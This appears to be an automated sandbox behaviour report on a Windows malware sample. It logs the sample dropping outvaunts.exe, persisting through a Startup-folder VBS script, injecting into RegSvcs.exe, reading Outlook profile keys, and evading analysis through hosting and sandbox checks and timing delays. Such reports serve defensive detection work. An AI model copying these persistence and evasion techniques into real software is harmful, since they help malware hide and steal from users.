                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Section loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Binary string: wntdll.pdbUGP source: outvaunts.exe, 00000002.00000003.2063899010.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000002.00000003.2065002937.0000000003810000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182637318.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182943669.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: outvaunts.exe, 00000002.00000003.2063899010.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000002.00000003.2065002937.0000000003810000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182637318.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182943669.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: 0_2_00EE8070 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: 0_2_00DF8B85 push ecx; ret 0_2_00DF8B98
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: 2_2_00C685D8 push eax; retf 0000h 2_2_00C685DB
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: 2_2_00C78B85 push ecx; ret 2_2_00C78B98
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: 5_2_00C685D8 push eax; retf 0000h 5_2_00C685DB
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: 5_2_00C78B85 push ecx; ret 5_2_00C78B98
                    Source: initial sample Static PE information: section name: UPX0
                    Source: initial sample Static PE information: section name: UPX1
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe File created: C:\Users\user\AppData\Local\kinematical\outvaunts.exe

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: 0_2_00DD4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: 0_2_00E555FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: 2_2_00C54A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: 2_2_00CD55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: 5_2_00C54A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: 5_2_00CD55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: 0_2_00DF33C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 5752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 6156, type: MEMORYSTR
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeAPI/Special instruction interceptor: Address: 1111EFC
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeAPI/Special instruction interceptor: Address: 17CF114
                    Source: outvaunts.exe, 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2187480515.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599734
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599624
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599515
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599252
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598889
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598124
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597796
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597249
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596921
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596790
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596324
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596217
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595874
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594999
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599331
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598982
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598092
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595115
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594975
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593531
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7829
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2381
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7454
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-99295
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeAPI coverage: 4.5 %
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeAPI coverage: 4.6 %
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeAPI coverage: 4.4 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E34696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00E34696
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E3C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00E3C9C7
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E3C93C FindFirstFileW,FindClose, 0_2_00E3C93C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E3F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00E3F200
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E3F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00E3F35D
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E3F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00E3F65E
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E33A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E33A2B
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E33D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E33D4E
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E3BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00E3BF27
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CB4696 GetFileAttributesW,FindFirstFileW,FindClose, 2_2_00CB4696
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CBC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 2_2_00CBC9C7
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CBC93C FindFirstFileW,FindClose, 2_2_00CBC93C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CBF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00CBF200
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CBF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00CBF35D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CBF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_00CBF65E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CB3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_00CB3A2B
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CB3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_00CB3D4E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CBBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_00CBBF27
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CB4696 GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00CB4696
